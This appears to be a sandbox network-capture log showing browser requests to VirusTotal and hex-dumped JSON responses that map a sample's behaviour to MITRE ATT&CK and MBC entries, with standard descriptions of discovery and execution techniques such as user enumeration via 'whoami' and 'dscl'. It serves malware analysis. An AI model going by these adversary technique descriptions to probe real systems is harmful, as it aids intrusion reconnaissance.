                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC523INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 41 50 45 20 53 61 6e 64 62 6f 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 61 63 74 69 63 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 54 41 30 30 30 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 44 69 73 63 6f 76 65 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 74 74 61 63 6b 2e 6d 69 74 72 65 2e 6f 72 67 2f 74 61 63 74 69 63 73 2f 54 41 30 30 30 37 2f 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: { "data": { "CAPE Sandbox": { "tactics": [ { "id": "TA0007", "name": "Discovery", "link": "https://attack.mitre.org/tactics/TA0007/", "
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 6f 72 65 20 64 65 63 69 64 69 6e 67 20 68 6f 77 20 74 6f 20 61 63 74 2e 20 54 68 65 79 20 61 6c 73 6f 20 61 6c 6c 6f 77 20 61 64 76 65 72 73 61 72 69 65 73 20 74 6f 20 65 78 70 6c 6f 72 65 20 77 68 61 74 20 74 68 65 79 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 61 6e 64 20 77 68 61 74 5c 75 32 30 31 39 73 20 61 72 6f 75 6e 64 20 74 68 65 69 72 20 65 6e 74 72 79 20 70 6f 69 6e 74 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 64 69 73 63 6f 76 65 72 20 68 6f 77 20 69 74 20 63 6f 75 6c 64 20 62 65 6e 65 66 69 74 20 74 68 65 69 72 20 63 75 72 72 65 6e 74 20 6f 62 6a 65 63 74 69 76 65 2e 20 4e 61 74 69 76 65 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 20 74 6f 6f 6c 73 20 61 72 65 20 6f 66 74 65 6e 20 75 73 65 64 20 74 6f 77 61 72 64 20 74 68 69 73 20 70 6f 73 74
                                                                                                                                                                                                                    Data Ascii: ore deciding how to act. They also allow adversaries to explore what they can control and what\u2019s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC545INData Raw: 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 68 6f 61 6d 69 2e 20 49 6e 20 6d 61 63 4f 53 20 61 6e 64 20 4c 69 6e 75 78 2c 20 74 68 65 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 20 63 61 6e 20 62 65 20 69 64 65 6e 74 69 66 69 65 64 20 77 69 74 68 20 77 20 61 6e 64 20 77 68 6f 2e 20 4f 6e 20 6d 61 63 4f 53 20 74 68 65 20 64 73 63 6c 20 2e 20 6c 69 73 74 20 2f 55 73 65 72 73 20 7c 20 67 72 65 70 20 2d 76 20 27 5f 27 20 63 6f 6d 6d 61 6e 64 20 63 61 6e 20 61 6c 73 6f 20 62 65 20 75 73 65 64 20 74 6f 20 65 6e 75 6d 65 72 61 74 65 20 75 73 65 72 20 61 63 63 6f 75 6e 74 73 2e 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 76 61 72 69 61 62 6c 65 73 2c 20 73 75 63 68 20 61 73 20 25 55 53 45 52 4e 41 4d 45
                                                                                                                                                                                                                    Data Ascii: s information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 76 65 72 69 74 79 22 3a 20 22 55 4e 4b 4e 4f 57 4e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 64 76 65 72 73 61 72 69 65 73 20 6d 61 79 20 61 74 74 65 6d 70 74 20 74 6f 20 69 64 65 6e 74 69 66 79 20 74 68 65 20 70 72 69 6d 61 72 79 20 75 73 65 72 2c 20 63 75 72 72 65 6e 74 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 75 73 65 72 2c 20 73 65 74 20 6f 66 20 75 73 65 72 73 20 74 68 61 74 20 63 6f 6d 6d 6f 6e 6c 79 20 75 73 65 73 20 61 20 73 79 73 74 65 6d 2c 20 6f 72 20 77 68 65 74 68 65 72 20 61 20 75 73 65 72 20 69 73 20 61 63 74 69 76 65 6c 79 20
                                                                                                                                                                                                                    Data Ascii: "severity": "UNKNOWN", "description": "Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 65 20 61 20 4e 65 74 77 6f 72 6b 20 44 65 76 69 63 65 20 43 4c 49 20 6f 6e 20 6e 65 74 77 6f 72 6b 20 64 65 76 69 63 65 73 20 74 6f 20 67 61 74 68 65 72 20 64 65 74 61 69 6c 65 64 20 73 79 73 74 65 6d 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 28 65 2e 67 2e 20 73 68 6f 77 20 76 65 72 73 69 6f 6e 29 2e 20 53 79 73 74 65 6d 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 44 69 73 63 6f 76 65 72 79 20 63 6f 6d 62 69 6e 65 64 20 77 69 74 68 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 67 61 74 68 65 72 65 64 20 66 72 6f 6d 20 6f 74 68 65 72 20 66 6f 72 6d 73 20 6f 66 20 64 69 73 63 6f 76 65 72 79 20 61 6e 64 20 72 65 63 6f 6e 6e 61 69 73 73 61 6e 63 65 20 63 61 6e 20 64 72 69 76 65 20 70 61 79 6c 6f 61 64 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 61 6e 64 20 63 6f 6e 63 65 61 6c
                                                                                                                                                                                                                    Data Ascii: e a Network Device CLI on network devices to gather detailed system information (e.g. show version). System Information Discovery combined with information gathered from other forms of discovery and reconnaissance can drive payload development and conceal
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1280INData Raw: 69 73 74 72 79 20 63 6f 6e 74 61 69 6e 73 20 61 20 73 69 67 6e 69 66 69 63 61 6e 74 20 61 6d 6f 75 6e 74 20 6f 66 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 2c 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2c 20 73 6f 66 74 77 61 72 65 2c 20 61 6e 64 20 73 65 63 75 72 69 74 79 2e 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 63 61 6e 20 65 61 73 69 6c 79 20 62 65 20 71 75 65 72 69 65 64 20 75 73 69 6e 67 20 74 68 65 20 52 65 67 20 75 74 69 6c 69 74 79 2c 20 74 68 6f 75 67 68 20 6f 74 68 65 72 20 6d 65 61 6e 73 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 52 65 67 69 73 74 72 79 20 65 78 69 73 74 2e 20 53 6f 6d 65 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6d 61 79 20 68 65 6c
                                                                                                                                                                                                                    Data Ascii: istry contains a significant amount of information about the operating system, configuration, software, and security. Information can easily be queried using the Reg utility, though other means to access the Registry exist. Some of the information may hel
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 64 76 65 72 73 61 72 79 2d 63 6f 6e 74 72 6f 6c 6c 65 64 20 63 6f 64 65 20 72 75 6e 6e 69 6e 67 20 6f 6e 20 61 20 6c 6f 63 61 6c 20 6f 72 20 72 65 6d 6f 74 65 20 73 79 73 74 65 6d 2e 20 54 65 63 68 6e 69 71 75 65 73 20 74 68 61 74 20 72 75 6e 20 6d 61 6c 69 63 69 6f 75 73 20 63 6f 64 65 20 61 72 65 20 6f 66 74 65 6e 20 70 61 69 72 65 64 20 77 69 74 68 20 74 65 63 68 6e 69 71 75 65 73 20 66 72 6f 6d 20 61 6c 6c 20 6f 74 68 65 72 20 74 61 63 74 69 63 73 20 74 6f 20 61 63 68 69 65 76 65 20 62 72 6f 61 64 65 72 20 67 6f 61 6c 73 2c 20 6c 69 6b 65 20 65 78 70 6c 6f 72 69 6e 67 20 61 20 6e 65 74 77 6f 72 6b 20 6f 72 20 73 74 65 61 6c 69 6e 67 20 64 61 74 61 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 61 6e 20 61 64 76 65 72 73 61 72 79 20 6d 69 67 68 74 20 75
                                                                                                                                                                                                                    Data Ascii: dversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might u
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 20 63 6f 6d 6d 6f 6e 20 70 72 61 63 74 69 63 65 20 75 73 65 73 20 2e 64 79 6c 69 62 20 66 69 6c 65 73 2e 5c 6e 54 68 65 20 57 69 6e 64 6f 77 73 20 6d 6f 64 75 6c 65 20 6c 6f 61 64 65 72 20 63 61 6e 20 62 65 20 69 6e 73 74 72 75 63 74 65 64 20 74 6f 20 6c 6f 61 64 20 44 4c 4c 73 20 66 72 6f 6d 20 61 72 62 69 74 72 61 72 79 20 6c 6f 63 61 6c 20 70 61 74 68 73 20 61 6e 64 20 61 72 62 69 74 72 61 72 79 20 55 6e 69 76 65 72 73 61 6c 20 4e 61 6d 69 6e 67 20 43 6f 6e 76 65 6e 74 69 6f 6e 20 28 55 4e 43 29 20 6e 65 74 77 6f 72 6b 20 70 61 74 68 73 2e 20 54 68 69 73 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 72 65 73 69 64 65 73 20 69 6e 20 4e 54 44 4c 4c 2e 64 6c 6c 20 61 6e 64 20 69 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 57 69 6e 64 6f 77 73 20 4e 61 74 69
                                                                                                                                                                                                                    Data Ascii: common practice uses .dylib files.\nThe Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Nati
                                                                                                                                                                                                                    2024-04-25 19:56:00 UTC1280INData Raw: 6e 63 74 69 6f 6e 73 20 61 73 20 61 20 6d 65 61 6e 73 20 6f 66 20 65 78 65 63 75 74 69 6e 67 20 62 65 68 61 76 69 6f 72 73 2e 20 53 69 6d 69 6c 61 72 20 74 6f 20 43 6f 6d 6d 61 6e 64 20 61 6e 64 20 53 63 72 69 70 74 69 6e 67 20 49 6e 74 65 72 70 72 65 74 65 72 2c 20 74 68 65 20 6e 61 74 69 76 65 20 41 50 49 20 61 6e 64 20 69 74 73 20 68 69 65 72 61 72 63 68 79 20 6f 66 20 69 6e 74 65 72 66 61 63 65 73 20 70 72 6f 76 69 64 65 20 6d 65 63 68 61 6e 69 73 6d 73 20 74 6f 20 69 6e 74 65 72 61 63 74 20 77 69 74 68 20 61 6e 64 20 75 74 69 6c 69 7a 65 20 76 61 72 69 6f 75 73 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 6f 66 20 61 20 76 69 63 74 69 6d 69 7a 65 64 20 73 79 73 74 65 6d 2e 5c 6e 4e 61 74 69 76 65 20 41 50 49 20 66 75 6e 63 74 69 6f 6e 73 20 28 73 75 63 68 20
                                                                                                                                                                                                                    Data Ascii: nctions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\nNative API functions (such
                                                                                                                                                                                                                    2024-04-25 19:56:00 UTC1408INData Raw: 20 6d 6f 6e 69 74 6f 72 65 64 20 66 75 6e 63 74 69 6f 6e 73 20 76 69 61 20 44 69 73 61 62 6c 65 20 6f 72 20 4d 6f 64 69 66 79 20 54 6f 6f 6c 73 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 69 67 6e 61 74 75 72 65 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 76 65 72 69 74 79 22 3a 20 22 55 4e 4b 4e 4f 57 4e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 41 64 76 65 72 73 61 72 69 65 73 20 6d 61
                                                                                                                                                                                                                    Data Ascii: monitored functions via Disable or Modify Tools.", "signatures": [ { "severity": "UNKNOWN", "description": "Adversaries ma


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    218192.168.2.164997674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC959OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTYyOTE2OTk4OTUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQx
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 2f2c9faa0e39b065b713b735749b5a6a;o=1
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 18372
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC519INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 43 41 50 45 20 53 61 6e 64 62 6f 78 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6f 62 6a 65 63 74 69 76 65 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 42 30 30 30 37 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 44 69 73 63 6f 76 65 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 64 69 73 63 6f 76 65 72
                                                                                                                                                                                                                    Data Ascii: { "data": { "CAPE Sandbox": { "objectives": [ { "id": "OB0007", "name": "Discovery", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/discover
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 44 69 73 63 6f 76 65 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 64 69 73 63 6f 76 65 72 79 2f 73 79 73 74 65 6d 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 64 69 73 63 6f 76 65 72 79 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 61 6c 77 61 72 65 20 6d 61 79 20 61 74 74 65 6d 70 74 20 74 6f 20 67 65 74 20 64 65 74 61 69 6c 65 64 20 69 6e 66
                                                                                                                                                                                                                    Data Ascii: ame": "System Information Discovery", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/discovery/system-information-discovery.md", "description": "Malware may attempt to get detailed inf
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC543INData Raw: 73 20 68 61 76 65 20 62 65 65 6e 20 67 72 6f 75 70 65 64 20 74 6f 20 62 65 74 74 65 72 20 66 61 63 69 6c 69 61 74 65 20 6c 61 62 65 6c 69 6e 67 20 61 6e 64 20 6d 61 70 70 69 6e 67 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 73 22 3a 20 5b 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 30 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 57 69 6e 49 4e 65 74 22 2c 0a 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: s have been grouped to better faciliate labeling and mapping.", "methods": [] }, { "id": "C0005", "name": "WinINet",
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 54 50 20 70 72 6f 74 6f 63 6f 6c 73 20 74 6f 20 61 63 63 65 73 73 20 49 6e 74 65 72 6e 65 74 20 72 65 73 6f 75 72 63 65 73 2e 5c 6e 5c 6e 54 68 65 20 6d 65 74 68 6f 64 73 20 62 65 6c 6f 77 20 61 72 65 20 74 68 6f 73 65 20 6f 66 20 6d 6f 73 74 20 69 6e 74 65 72 65 73 74 20 69 6e 20 6d 61 6c 77 61 72 65 20 61 6e 61 6c 79 73 69 73 2e 20 44 65 74 61 69 6c 73 20 63 61 6e 20 62 65 20 66 6f 75 6e 64 20 61 74 20 5b 31 5d 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22
                                                                                                                                                                                                                    Data Ascii: TP protocols to access Internet resources.\n\nThe methods below are those of most interest in malware analysis. Details can be found at [1].", "methods": [ { "
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 3a 20 22 4d 61 6c 77 61 72 65 20 6d 61 79 20 68 69 64 65 20 66 69 6c 65 73 20 61 6e 64 20 66 6f 6c 64 65 72 73 20 74 6f 20 61 76 6f 69 64 20 64 65 74 65 63 74 69 6f 6e 20 61 6e 64 2f 6f 72 20 74 6f 20 70 65 72 73 69 73 74 20 6f 6e 20 74 68 65 20 73 79 73 74 65 6d 2e 20 53 65 65 20 70 6f 74 65 6e 74 69 61 6c 20 6d 65 74 68 6f 64 73 20 62 65 6c 6f 77 2e 20 54 68 69 73 20 69 73 20 61 63 68 69 65 76 65 64 20 62 79 20 6d 61 72 6b 69 6e 67 20 66 69 6c 65 73 20 6f 72 20 64 69 72 65 63 74 6f 72 69 65 73 20 61 73 20 68 69 64 64 65 6e 20 6f 72 20 62 79 20 75 73 69 6e 67 20 73 70 65 63 69 61 6c 20 63 68 61 72 61 63 74 65 72 73 20 69 6e 20 66 69 6c 65 20 6e 61 6d 65 73 20 74 6f 20 70 72 65 76 65 6e 74 20 74 68 65 6d 20 66 72 6f 6d 20 62 65 69 6e 67 20 64 69 73 70 6c
                                                                                                                                                                                                                    Data Ascii: : "Malware may hide files and folders to avoid detection and/or to persist on the system. See potential methods below. This is achieved by marking files or directories as hidden or by using special characters in file names to prevent them from being displ
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4f 43 30 30 30 32 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 4d 65 6d 6f 72 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 6d 69 63 72 6f 2d 62 65 68 61 76 69 6f 72
                                                                                                                                                                                                                    Data Ascii: } ] }, { "id": "OC0002", "name": "Memory", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/micro-behavior
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 4d 69 63 72 6f 2d 62 65 68 61 76 69 6f 72 73 20 72 65 6c 61 74 65 64 20 74 6f 20 70 72 6f 63 65 73 73 65 73 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 62 65 68 61 76 69 6f 72 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 43 30 30 31 38 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 54 65 72 6d 69 6e 61 74 65 20 50 72 6f 63 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                                                                    Data Ascii: Micro-behaviors related to processes.", "behaviors": [ { "id": "C0018", "name": "Terminate Process", "link": "https://github.co
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1408INData Raw: 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 6d 69 63 72 6f 2d 62 65 68 61 76 69 6f 72 73 2f 66 69 6c 65 2d 73 79 73 74 65 6d 2f 63 72 65 61 74 65 2d 66 69 6c 65 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 4d 61 6c 77 61 72 65 20 63 72 65 61 74 65 73 20 61 20 66 69 6c 65 2e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 73 22 3a 20 5b 5d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5d
                                                                                                                                                                                                                    Data Ascii: tps://github.com/MBCProject/mbc-markdown/blob/main/micro-behaviors/file-system/create-file.md", "description": "Malware creates a file.", "methods": [] } ]
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC1280INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 42 30 30 30 31 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 44 65 62 75 67 67 65 72 20 44 65 74 65 63 74 69 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 4d 42 43 50 72 6f 6a 65 63 74 2f 6d 62 63 2d 6d 61 72 6b 64 6f 77 6e 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 61 6e 74 69 2d 62 65 68 61 76 69 6f 72 61 6c 2d 61 6e 61 6c 79 73 69 73 2f 64 65 62 75 67 67 65 72 2d 64 65 74 65 63 74 69 6f 6e 2e 6d 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "id": "B0001", "name": "Debugger Detection", "link": "https://github.com/MBCProject/mbc-markdown/blob/main/anti-behavioral-analysis/debugger-detection.md",
